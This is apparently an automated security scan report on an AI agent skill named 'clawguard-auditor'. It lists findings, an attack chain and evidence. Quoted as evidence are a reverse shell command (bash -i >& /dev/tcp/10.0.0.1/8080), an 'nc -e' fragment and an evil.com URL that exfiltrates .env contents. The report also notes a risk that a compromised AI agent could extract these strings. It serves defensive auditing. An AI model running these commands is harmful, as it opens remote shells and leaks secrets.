clawguard-auditor
Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.
Why this conclusion was reached
2/4 dimensions flaggedDeclared resources and inferred behavior are broadly aligned.
2 high-risk artifacts or egress signals were extracted.
The report includes 4 attack-chain steps and 1 severe findings.
Dependency information is incomplete, so supply-chain confidence stays limited.
Attack Chain
Entry · SKILL.md:1
weaponization · SKILL.md:55
exploitation · SKILL.md:55
Impact · SKILL.md:55
What drove the risk score up
SKILL.md:55 contains 'nc -e' and 'bash -i >& /dev/tcp' strings embedded in documentation
SKILL.md:99 contains 'http://evil.com/?data=$(cat .env)' as detection example
Skill describes extensive capabilities (WRITE, ADMIN, NET_EGRESS) for documentation-only implementation
Absence of scripts/ directory, requirements.txt, or any code files reduces practical risk
Patterns appear in 'SAST Red Flag Hunt' section as detection examples
All files are Markdown/JSON with no executable code present
Most important evidence
Embedded reverse shell command patterns
SKILL.md contains literal strings 'nc -e' and 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' at line 55 within a list of 'red flags to detect'. While in context these are examples, they represent dangerous patterns that could be extracted by prompt injection or interpreted by a compromised AI agent.
SKILL.md:55 Data exfiltration pattern example
SKILL.md contains 'http://evil.com/?data=$(cat .env)' as an example of what the DLP engine should block. This embeds a real exfiltration technique as instructional content.
SKILL.md:99 Capabilities exceed implementation
The skill describes requiring CAP_FS_WRITE, CAP_NET_EGRESS, CAP_SYS_EXEC, and CAP_FS_READ_SENSITIVE capabilities, but no executable code files exist. This creates a mismatch between declared purpose and actual functionality.
SKILL.md:25 Documentation-only implementation
All files are Markdown or JSON with no scripts/, requirements.txt, package.json, or any executable code. The skill is a specification without implementation.
SKILL.md:1 Declared capability vs actual capability
SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it SKILL.md describes NET_EGRESS token but no network code present No shell scripts or subprocess calls in any file Mentions credential access but no code implements it Suspicious artifacts and egress
nc -e SKILL.md:55
bash -i >& SKILL.md:55
http://evil.com/?data=$(cat SKILL.md:99
Dependencies and supply chain
There are no structured dependency warnings.
File composition
SKILL.md